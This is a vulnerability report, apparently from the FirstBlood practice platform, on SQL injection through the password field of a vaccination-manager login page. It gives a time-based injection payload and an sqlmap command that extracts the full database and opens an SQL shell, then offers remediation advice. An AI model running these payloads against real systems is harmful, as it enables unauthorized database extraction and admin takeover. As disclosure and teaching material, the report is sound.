FirstBlood-#603 — SQL Injection on /vaccination-manager/login.php through password parameter
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-26, holybugx reported:
SQL Injection is possible on the Vaccination Management Panel using the
passwordparameter. Using this SQL Injection I was able to completely extract the database and gain access to the
Steps To Reproduce
- Open Vaccination Management Panel and use
adminas the username. Intercept the request to "Secure Login":
admin' or sleep(10) and 1=1#as the value of the password parameter and inspect the response time:
As observed, the SQL Injection vulnerability is valid. It's possible to further exploit this to extract the complete database.
One of the best tools to automate the exploitation of SQL Injection is SQLMap.
Copy the POST request to
/vaccination-manager/login.phpand save it inside a file (req.txt).
Use the following command to run the SQLMap and extract all database details:
sqlmap.py -r req.txt -p password --batch --random-agent -a
It is also possible to get an interactive SQL shell using the
--sql-shellflag of the SQLMap:
After analyzing the output, I found the
admincredentials used to login to the Vaccination Management portal:
- SQL Injection leading to complete extraction of the database as well as interactive SQL shell
The only sure way to prevent SQL Injection attacks is input validation and parameterized queries including prepared statements. The application code should never use the input directly. The developer must sanitize all input, not only web form inputs such as login forms. In your case the login form was vulnerable. but to be sure, it's better to implement proper input validation on all user inputs.
You must remove potential malicious code elements such as single quotes. It is also a good idea to turn off the visibility of database errors on your production sites. Database errors can be used with SQL Injection to gain information about your database. There were no database errors in your case, but it's always good to keep that in mind.
Some functions like
mysqli_real_escape_string()in PHP can also protect against them. But careful to read the documentation when using those kinds of functions. For example, in PHP
addslashes()may seem to be a good alternative but cheap when it comes to SQL injection protection due to malicious charset tricks.
FirstBlood ID: 30
Vulnerability Type: SQL Injection
There is an SQL injection on the vaccination management portal login page which results in the user being able to login as the administrator.